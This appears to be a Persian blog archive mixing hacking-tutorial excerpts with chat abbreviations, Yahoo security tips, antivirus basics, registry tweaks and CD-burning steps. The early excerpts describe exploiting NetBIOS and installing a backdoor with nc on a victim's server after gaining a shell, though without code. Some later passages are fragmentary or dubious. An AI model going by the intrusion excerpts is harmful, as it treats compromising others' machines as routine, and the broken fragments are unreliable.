Vulnerability يا بهصورت مختصر vul را در فارسي حفره يا سوراخ امنيتي ميگيم. اين عبارت رو بايد يه کم توضيح بدم. فرض کنيد که يه نرمافزار داريم که يه پورتي رو باز ميکنه. وقتي اين نرمافزار قرار هست که منتشر بشه، شرکت سازنده يه سري تست رو نرمافزار انجام ميده که مشکلي نداشته باشه.
احتمالا ميدونيد که Netbios پرتکل معروف مايکروسافت براي ارتباط ويندوز ها با هم و احتمالا Share کردن پرينتر يا فايله. همچنين وقتي که بحث نفوذ به Client و بر بعضي مواقع Server ها پيش مياد، Netbios يکي از اولين انتخاب هاست. ما در اين مقاله سعي ميکنيم از اين ضعف سيستم عاملهاي مايکروسافت سوءاستفاده کنيم.
NetBIOS مخفف عبارت Network Basic Input/Output System است. NetBIOS ابزاري است که اجازه به اشتراک گذاشتن منابع رو به ما ميده. ما برای به اشتراک گذاشتن فايلها و يا پرينتر ميتونيم از اين پروتکل استفاده کنيم
پورت ۱۱۰ براي پروتکل POP3 استفاده ميشود. عبارت POP3 مخفف Post Office Protocol Version 3 است که اين پروتکل براي خواندن E-mail استفاده ميشود. براي کار با اين پروتکل بايد آدرس POP Server مربوط به E-mail خود را بدانيد
روي پورت ۲۵ اجرا ميشد. از اين پروتکل براي ارسال E-mail استفاده میشود. اين پروتکل امروزه ديگه براي خوندن E-mail استفاده نميشه. اين پروتکل بحث امروز ماست
پورت ۸۰ يکی از مهمترين پورتهاست. دنيای وب (صفحات اينترنتی) بر اساس همين پورت کار میکنه. توضيح اينکه وقتی به يه سايت وصل میشيم و صفحه وب را درخواست میکنيم، در واقع مرورگر اينترنتی به پورت ۸۰ اون کامپيوتر وصل میشه و اطلاعات رو میگيره
IP Scanning به روشهای مختلف میتواند صورت بگيرد
اگر بخواهيد مهمترين ابزاری را که يک هکر برای footprinting استفاده میکند بدانيد، آن نرمافزار nmap خواهد بود که برای سيستمهای لينوکس و يونيکس طراحی شده است. برای هکرهای تازهکار که سيستمعامل ويندوز را به کار میبرند، نسخه گرافيکی و تحت ويندوزی طراحی شده است که NMapWin نام دارد و همان امکانات را فراهم میآورد
Backorifice يك برنامه كاربردى سرويسدهنده / سرويسگيرنده است كه به نرمافزار سرويسگيرنده اجازه نظارت، مديريت و اجراى ديگر اعمال چندرسانهايى و شبكه را بر روى ماشينى كه در حال اجراى سرويسدهنده است، مىدهد. براى ارتباط برقراركردن با سرويسدهنده، متن و يا سرويسگيرنده gui مىتوانند بر روى هر ماشين ويندوز مايكروسافت به اجرا دربيايند. سرويسدهنده بطور متداول فقط در ويندوز 98/95 اجرا مىشود.
حملات تزريق دو مرحله اي ، جديد و خطرناك - بخش آخر
طبیعت تزریق کدهای معمولي به گونه ای است که خیلی راحت قابل کشف هستند. با فرستادن یک URL تركيب شده براي حمله (بطور مثال وجود عبارتی شبیه به ) و دیدن پاسخ سرور ، پروسه کشف آسیب پذیری به صورت مکانیزه در می آید.
حملات تزريق دو مرحله اي ، جديد و خطرناك
يكي از مشكلات بزرگ ويندوز كه در Service pack هاي ويندوز هم وجود داره IPC هست
ضروريات ويندوز سرور براي هکرها - قسمت پنجم
براي بعضي کارهاي خاص، بعضي سرويسها بايد در کامپيوتر قرباني فعال باشند يا ما بايد فعالشون کنيم. ( مثلا در درسهاي قبلي در مورد schedule service مطالبي رو به شما گفتم. فرمودم! که اگه بخوايم کارهاي زمانبندي شده رو در سرور ويندوز انجام بديم، اين سرويس بايد بهراه باشه. ) بنابراين از ديد يک هکر بعضي سرويسها مهمتر هستند که به اونها خواهيم پرداخت.
ضروريات ويندوز سرور براي هکرها - قسمت سوم
همونطور که گفتم ما داريم در مورد يک ويندوز سرور منفرد صحبت ميکنيم، بنابراين منظور من از اکانت، اکانتهاي محلي يا local است ( وقتي چند ويندوز سرور در کنار هم و به صورت شبکه مورد استفاده هستند، معمولا اکانتهاي سراسري يا global هم ست ميشود که براي دسترسي به منابع در domain مورد استفاده قرار ميگيرد.
ضروريات ويندوز سرور براي هکرها - قسمت دوم
اولين کاري که بعد از بدستآوردن shell ويندوز انجام ميشه، بستگي به هکر و روش اون داره. من هميشه سعي ميکنم که يک تروجان يا backdoor در کامپيوتر قرباني نصب کنم و معمولا هم nc رو به کار ميبرم
ضروريات ويندوز سرور براي هکرها - قسمت اول
تجربه بهم ثابت کرده که خيلي از افرادي که ويندوز سرور هک ميکنند، بعد از اينکه به shell دست مييابند، نميدونند که بعدش دنبال چي باشند. حتي بعضيها بعد از اينکه به کمک يک نرمافزار آماده اين کار رو انجام ميدهند، حتي نميتونند از دستورات خط فرماني ويندوز استفاده کنند
کار با نرمافزار Nessus
يک نرمافزار براي Vulnerability Scanning است. اگر بخوام دقيقتر بگم بهترين نرمافزار Vul Scanning که به صورت Network-Based به کار ميره همين نرمافزار است. مهمترين ويژگي اين نرمافزار مجاني و Open-Source بودن آن است ( اگرچه تو ايران همهچي مجانيه! ) اين نرمافزار توسط Renaud Deraison نوشته شده و توسط او توسعه پيدا ميکند. الان که من دارم مقاله رو مينويسم، نسخه 2.0.7 اون ارائه شده است
در چت کردن یک سری از اختصارات وجود داره که گفتم براتون بگم البته با مشورت یکی!!!!
البته نا گفته نماند که اونایی که چت می کنند بیشترشون از این اختصارات فقط asl و یه Bf /Gf رو بلدند
(ایرانیا)
خوب بریم سره اصل مطلب :
معنی به فارسی
کلمه یا جمله اصلی اختصار
Hi THere-----HT سلام
How Are You-----HRU ? حالت چه طوره؟
Age/Sex/Location-----ASL سن/جنس/مکان
Has Left THe CHat-----Poof چت را ترک کردن
Az Far As I Know-----AFAIK تا آنجایی که من میدانم
As Soon As possible------ASAP به زودی
OH My God------OMG اه خدای من
Boy Friend-----Bf دوست پسر
Girl Friend-----Gf دوست دختر
By THe Way-----BTW راستی
On RHe Other Hand-----OTOH از طرف دیگر
Email Messege-----EMSG پیغام الکترونیکی
Face to Face-----F2F رو در ور
Tank You-----TY متشکر از شما
In Any Event-----IAE در هر صورت
OH I See----OIC عجب.فهمیدم
I see-----IC فهمیدم
In My Oponion-----IMO به نظر من
I'm Sorry-----IMS متاسفم
Love You Foreve------LYF برای همیشه دوستت دارم
Love Ya-----LY دوستت دارم
I Love You-----ILY دوستت دارم
For Your Information------FYI جهت اطلاع تو
In Othere Word-----IOW به بیان دیگر
Just Kidding-----Jk شوخی میکنم
Evil Grin-----EG پوزخند شیطانی
Big Evil Grin-----BEG خنده شدید شیطانی
Laugh-----L خنده
Laugh Out Loud------LOL خندیدن با صدای بلند
Smile------S لبخند
Rolling on floor Laughing-----ROFL از خنده روی زمین غلط زدن
Rolls On THe Floor Laughing-----ROTFL از خنده روی زمین غلط زدن
Private Message-----PM پیغام خصوصی
Kiss On CHeek-----KOC بوسه بر گونه
Hug And kiss----H&K بوسه زدن و بغل کردن
THanks-----TNX متشکر
Kiss On Lips-----KOL بوسه روی لبها زدن
Later-------L8R بعدا
FinGers Crossed-----FC دعا کردن
Write Back Soon-----WBS زود جواب نامه را بده
Don't Write Back ------DWB جواب نامه را نده
Long Time No See-----LTNS برای مدت طولانی بی خبر بودن
Be Right Back--------BRB الان بر میگردم
Be Back Soon-----BBS زود بر میگردم
Be Back Later-----BBL بعدا بر میگردم
Talk To You Later-----TTYL بعدا به تو میگویم
THinking Of You-----Toy به فکر تو هستم
Till Next Time-----TNT تا دفعه بعد
See You Later See You Later-----CUL8R
See You Later See You Later-----SY8TR
See You Soon-----SYS به زودی می بینمت
See You-----CU می بینمت
Gone For Now------GFN فعلا میروم
Glad To See You-----GTSY از دیدن تو خوشحال شدم
Nice To See You------Nice 2 C U از دیدن تو خوشحال شدم
Away From Keyboard----AFK دور از صفحه کلید
Good Luck----GL موفق باشی
Ta Ta For Now------TTFN فعلا خداحافظ
Bye Bye Now-------BBN خدا حافظ
Bye Bye Now-------BFN خداحافظ
تذکر:جون مادراتون به این یکی دیگه نظر بدین غینم در آمد تا اینو تایپ کردم
با رعایت نکات زیر امکان بسته شدن یا بدست اوردن پسورد در یاهو رو به حداقل برسونید:
1. اینکه پسورد یاهو هک شه دیگه دورانش گذشته اونقدر یاهو امنیتش رو بالا برده که دیگه باید خواب بدست اوردن پسورد رو فقط ببینیم اگرم الان میگن فلانی پسورد یکی رو بدت اورده فقط به علت بی احتیاتی خودشه که دلایلش رو پایین نوشتم
2.اقا جان وقتی کارتون با مسنجر یا mail box تموم میشه حتمآ sign out کنید این موضوع خیلی مهمه در مبحث استفاده از ردپاها یا همون cookies ها روشی هست که هر چند تعداد خیلی کمی میتونن ازش استفاده کنن ولی میتونن از همین ردپا ها استفاده کنن و ایمیل های شما رو بخونن ولی با این روش نمی تونن پسورد بدست بیارن
3.حتمآ از پسورد های امن استفاده کنید مثلآ ورندارین شماره تلفن خونتون رو بزارین پسورید یا اسم دوست دختر یا دوست پسرتون رو سعی کنید از کارکترهایی مثل @ در پسورد خودتون استفاده کنید این موضوع به خاطر اینه که با پسورد یاب ها نتونن کلمه عبورتون رو بدست بیارن هر چند باز بخاطر بالا رفتن امنیت یاهو این کارم تخته شده!
4.اقا یارو میگه میخواد واست فایل بفرسته مثلا عکس خودشو شما به سه شماره میگرید بعدم اجرا میکنید اخر سرم میگید error داد یارو هم میگه اشکال از سیستم خودت شما میگین بیخیال حالا بگو منو چندتا دوست داری!!!!!!!!!
5.وقتی یه فایلی فرستاده میشه به پسوند اون دقت کنید دیگه تابلو که پسوند عکس چیزایی مثل gif/jpg و.... هست و فایل های اجرایی exe/com/bat که اکثرا تروجان ها در قالب exe فرستاده میشه
6. بعضی ها میان زرنگی کنن ور میدارن بعد از پسوند فایل چند تا space میزنند همون طوری که میدونید در ویندوز نام فایل ها تا 11 کاراکتر نشون داده میشه و اگه بیشتر بشه ....... میزاره به اینم هواستون باشه که طرف کلک رشتی نزنه
7.این دیگه واقعا دورانش گذشته اونم استفاده از fake login هستش هر چند الان این راه بیشترین قربانی رو میده هواستون باشه تو هر صفحه که میرید تا لاگین دیدید ور ندارین پسوردتون رو بدید چون با اینکار پسورد خودتون رو دو دستی تقدیم به اون کسی کردین که این صفحه رو ساخته
8. یه کلک رشتی که کمتر به فکر کسی میرسه گذاشتن یک تروجان به جای فونت مخصوص یک سایته که روشی که هنوز خیلی لو نرفته فرض کنید وارد یک صفحه میشید که اصلا نمیتونید فونتشو بخونید حالا یه لینک پایین گذاشته که گفته اقا جان این فایل رو دریافت کنید بعد از نصب میتونید متن صفحه رو بخونید حالا حساب کنید به جای فایل مربوط به فونت یک تروجان باشه!
9.یه نکته ای هست اونم در مورد بسته شدن مسنجره ببینید یکی از دلایل اصلی که شما تو ایمیل میتونید برید ولی مسنجرتون باز نمیشه استفاده از بوترهاست که اینم بر میگرده به سیستم امنیتی جدید یاهو که ممکنه مسنجر شما رو برای چند روز ببنده میگن هیچ راهی نیست که خود ادم درستش کنه و باید منتظر موند تا یاهو دلش به رحم بیاد و مسنجر رو باز کنه ولی باز میگن در این حال استفاده از yahoo messenger 5.0 تونسته به یه عده ادم کمک کنه
10. اگر نه تو مسنجر میرید نه تو یاهو میل و اون پیغام گند بسته شدن ID رو میبیند که متاسفانه راهی برای درست کردنش نیست به جز اینکه زنگ بزنید یاهو دو ساعت صحبت کنید تا راضی بشن که خوب این موضوع واسه کسایی که تو امریکان مثلآ برن دم در شرکت یاهو چهار تا داد بزنن یا چرخ ماشین اون دوتایی که یاهو رو ساختن پنچر کنن یا مثلا یه هزاری بزارن تو جیب یارو مثلآ بگن ما فامیل اقای پشکل پناهیان هستیم شاید یه کاری براتون کردن ولی کلآ اگه اینجوری شد دیگه باید به طور کامل و برای همیشه بیخیال id تون بشین
11.یه سری password sender هست مثل k2ps که تمام پسوردهای کامپیوتر شما مثل اشتراک یا یاهو رو برای طرف میفرسته که باز اینم باید فایل مربوطه رو سیستم قربانی اجرا بشه خوب اگه طرف هواسش باشه چی رو داره اجرا میکنه مشکلی براش پیش نمیاد
12. شاید مهمترین نکته که خیلی ها بهش تاکید دارن استفاده از یک دیوار اتش مطمئن و همچنین یک انتی ویروس قوی هست که هر دویه این برنامه ها همیشه باید بروز باشن مثلآ برای دیوار اتش میتونین از zone alarm یا black ice استفاده کنید انتی ویروسم norton , pc-cillin , mcafee پیشنهاد میشه
13. هیچ وقت cookies های اینترنت اکسپلور رو نگه ندارید و همیشه پاک کنید برای این کار در از منوهای بالایه صفحه گزینه Tools رو انتخاب کنید و بعد delete cookies رو بزنید یا کلا از setting گزینه never رو بزنید تا دیگه ردپایی از شما باقی نمونه
آموزش مبارزه با ویرووسها =>
شما اولین کاری که برای مبارزه با اونا میکنین اینه که دستگاهتونو به یه آنتی ویرووس مجهز کنین که بهترینشون Norton.symantec.mcAfee.panda &avg هستش اما اینم بگم که آنتی ویرووسهای Norton روی بعضی از ویندوز های Xpجواب نمیده و باعث هنگ کردن سیستم میشه .
اگه شما آنتی ویرووس نداشتین و به ویرووس آلوده شدین اولین کار اینه که سیستم خودتون رو Restor کنین تا ویرووس به همه جا انتقال پیدا نکنه که برای Restor کردن مراحل زیر رو انجام بدین : =>
1- روی My computer راست کلیک کرده و Propertiseرو انتخاب کنین
2- از صفحه باز شده اون بالا لبه ی System Restore رو انتخاب کنین
3- گزینه Turn off System restore رو تیک بزنین و در آخر Apply ... OK
با این کار از ویرووسی شدن تمام سیستم جلوگیری میکنین .
قدم دوم شناسایی ویرووس هست که بازم با آنتی ویرووس های میشه پیدا کرد ( بهتره یه شناختی از ویرووس ها بهتون بدم )
آشنایی کلی با ویرووس های کامپیوتری
1- ویرووس ها در کل به سه گروه طبقه بندی میشن 1- اسب تروا (Troijan-hourse ) . کرم ها ( Worms ) . بمب های منطقی (Logical bomb )
اهداف ویرووس ها :
ویرووس ها جایی انتشار پیدا می کنن که دارای تغییر پذیری باشه مثل ( جداول - رکورد بوت - پرونده ها و ....... ) پرونده هایی که دارای پسوند های sys.bat.com & exe هستن هدفهای اونا هستن .
چگونگی انتشار ویرووس :
ویرووس ها بیشتر خودشون رو به اسناد و فولدر ها میچسبونن و از طریق اونا وارد میشن . اگه ما 2 تا فولدر داشته باشیم که دارای اسم های یکی باشن ولی پسوند هاشون فرق کنه کامپیوتر اول اون برنامرو اجرا میکنه که پسوند .com رو داشته باشه به همین علت ویرووسها خودشون رو با همون اسم فایل ها تکثیر می کنن اما با پسوند .com که کامپیوتر اونارو اجرا کنه .
ساختار ویرووس ها :
ویرووس ها از دو بخش تکثیر و تخریب تشکیل شده اند . بعضی از ویرووس ها فقط برنامرو آلوده می کنن. در برنامه های آلوده یک علامت می نویسن که به آنها امضای ویرووس میگن و وقتی ویرووس بخواد برنامرو آلوده کنه اول به دنبال امضاء میگرده اگه وجود نداشت اونو آلوده میکنه و الگه وجود داشت که میدونه برنامه آلوده هست
آنتی ویرووس ها :
آنتی ها دارای 2 گونه میباشن یکی مقیم و اون یکی غیر مقیم که فرق اونا اینه که آنتی مقیم به محض شروع فعالیت ویرووس اونو شناسایی و از بین میبره . اما آنتی غیر مقیم به این شکل نیست .
آنتی ویرووس ها یه دروازه هستن که همیشه وقتی برنامه بخواد اجرا بشه باید اول از آنتی بگذره و بعد به سیستم عامل بره . اما اگه آنتی وجود نداشته باشه برنامه یه راست میره به سیستم عامل .
معرفی چند ویرووس :
1-Disk killer اگر کامپیوتر بیشتر از 24 ساعت روشن باشه Hard disk رو خراب میکنه
2- lazy باعث کم شدن حافظه و سرعت سیستم میشه
3- Mistake تمام حروف را بر روی پرینتر عوض میکنه مثلا حرف c را k و k رو c چاپ میکنه
4- Pc-Flu باعث مختل شدن کار های آنتی ویرووس ها میشه
5- Blaster باعث ریست شدن کامپیوتر و تکثیر در آن میشود
6-Albania باعث تکثیر فراوان در کمتر از 3 ساعت است
7- Nimda باعث تکثیر فراوان شده و آیکون های اون شبیه به پاکت نامه است
زیاده ولی خسته نشید و بخوانید به دردتون میخوره :
۱.در هنگام ورود به ویندوز کلید Ctrl را نگه دارید تا برنامه های Startup اجرا نشود.![]()
پنجره ي CD writing wizard باز مي شود . نامCD را در قسمت CD name وارد كنيد و next را بزنيد تا رايت CD آغاز شود
۳.نحوه ی کردن درایو ها بدون ابزار و تخصص :
نحوه مخفی کردن درایو به شکل جدید
بچه های باحال این ترفند نه از طریق ریجستری هست و نه از طریق برنامه های مختلف که امکان ایجاد مشکل رو هم دارند این روش هیچ مشکلی درشت نمی کنه خوب زیاد حرف زدم بریم سره اصل مطلب :
بر روی My Computer کلیک راست کرده و سپس از بین گزینه های موجود گزینه ی Manage را انتخاب کرده،حال شما وارد پنجره ای با نام Computer Management میشوید و از قسمت شمت چپ بر روی Disk Management
دوبار کلیک کرده و حال به قسمت سمت راست پنجره Computer Management درایو های خودتان را می توانید مشاهده کنید و برای حذف هر کدام از درایو ها می توانید بر روی درایو مورد نظر خود رفته و سپس با کلیک راست کردن بر روی آن و انتخاب گزینه ی Change Drive Letter And Paths وارد پنجره ی مربوط به Change Drive Letter And Paths می شوید .حالا در پیش روی گل شما سه دکمه وجود دارد به نام های Change و Remove و Add که شما باید برای حذف درایو بر روی دکمه ی Remove و Change که شما باید برای حذف درایو بر روی دکمه ی Remove کلیک کنید و سپس پیغامی ظاهر میشود مبنی بر اینکه شما حذف را تائید مینمایید که اگر میخواهید حذف کنید بر روی Yes کلیک کنید در غیر این صورت دکمه ی No را کلیک نمایید حال درایو شما حذف شده و کاربر قادر به دیدن درایو مربوطه در لیسته درایوها نیست !!!
(الووووووو داداش کجایی بقــیشو گوش کن)![]()
حالا آق بهنام اگه خواستیم دوباره این درایور دوباره به لیست درایو ها برگردونیم باید چی کار کینم؟
خوب حالا اگه خواستیم این درایو را به لیست درایوها برگردانیم باید همان مراحل بالا را در پیش گرفته و فقط به جای دکمه ی Remove از دکمه ی Addاستفاده می نمایید.با این روش درایوها از گزینه ی Run که در Start وجود دارد هم قابل اجرا نیست.و کسی نمی تونه محتویات اون رودر Search هم پیدا کند.
۴.
امیدوارم به دردتون خورده باشه ولی برای خوشی من لطفا نظر یادتون نره ![]()
(آقا یه وقت به کسی بر نخوره اینو یکی خواسته بود منم گفتم)
سلام
ميتوان رجيستري را قلب ويندوز ناميد. با تغيير برخي از كدهاي رجيستري ميتوانيد برخي از خصوصيات ويندوز را كه خوشتان نمي آيد حذف ياتغيير دهيد.
تذكر مهم:
بايد دقيقا مثل همين كليدها را در رجيستري وارد كنيد.كوچكترين تغييري ممكن است منجر به دوباره اينستال كردن ويندوز شود.
براي شروع كار ابتدا در قسمت Run اين دستور را وارد كنيد و كليد OK را كليك كنيد:
Regedit
پس از تغيير دستور مورد نظر فقط پنجره Registry Editor را ببنديد و كامپيوتر را Restart كنيد تا تغييرات اعمال شوند.
حالا هر كدام از دستورات زير را كه دوست داريد ميتوانيد تغيير دهيد.
بدون Favorites :
اگر از در منوي خوشتان نمي آيد ميتوانيد آن را حذف كنيد.براي اين كار به زير كليد:
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
رفته و يك مقدار به نام NoFavoritesMenu بسازيد و به آن مقدار 1 دهيد.
برداشتن RUN از منوي START :
به زير كليد زير برويد:
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
و يك مقدار باينري به نام NoRun بسازيد و به آن مقدار01 بدهيد.بدين ترتيب حتي كليدهاي نيز كار نخواهند كرد.
بدون جاسوس:
وقتي سندي را باز ميكنيد , ويندوز يك ميانبر براي آن فايل درMy Documents در منوي Start قرار ميدهد.اين موضوع ميتواند به عنوان يك جاسوس بر ضد شما عمل كند.
براي حذف آن به زير كليد زير برويد:
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVresion\Polisies\Explorer]
و يك مقدار باينري به نام NoRecentDocsHistory بسازيد و به آن مقدار01 بدهيد.همچنين براي حذف آن از منوي ميتوانيد يك مقدار باينري به نام NoRecentDocsMenu بسازيد و به آن مقدار 01 را بدهيد.
موفق باشید
لطفا نظر فراموش نشه
توجه : ابتدا در صورت وجود پارتيشن آنها را پاك ميكنيم
خب از پن پنجره اصلي گزينه 3 رو انتخاب كنين.سپس پنجره اي ظاهر ميشه كه از او گزينه
:براي ايجاد پارتيشن از صفحه اصلي گزينه 1 يعني(1
.Create dos partion or logical…..) رو بزنين .ابتدا مي بايست ببينيد رايتر شما overburning ساپورت مي کنه يا نه . براي تست اين کار مراحل زير را دنبال کنيد :
ابتدا به برنامه Nero رفته و سپس کليد هاي ترکيبي Ctrl + R را فشار دهيد . تو اين پنجره ببينيد که در قسمت Recorder information ، رو به روي عبارت Over burn عبارت suported نوشته شده است يا نه . اگر عبارت ساپورت نوشته شده باشد شما مي تو نيد از اين ترفند استفاده کنيد .
حال به منوي File رفته و قسمت preferences رو انتخاب کنيد سپس در قسمت Expert features دقت کنيد که عبارت enable overburn قعال باشد . در زير همين گزينه مقدار مجاز overburn رو به دقيقه مشخص کنيد .
حال به منوي File رفته و گزينه New را انتخاب کنيد و در قسمت Multisession گزينه No Muttisession را انتخاب نماييد . سپس در قسمت Burn عبارت Write Method رو به Disc at Onec تبديل کنيد .
حال مي تونيد سي دي خود را رايت کنيد مقدار رايت هم بستگي خيلي زيادي به رايتر داره .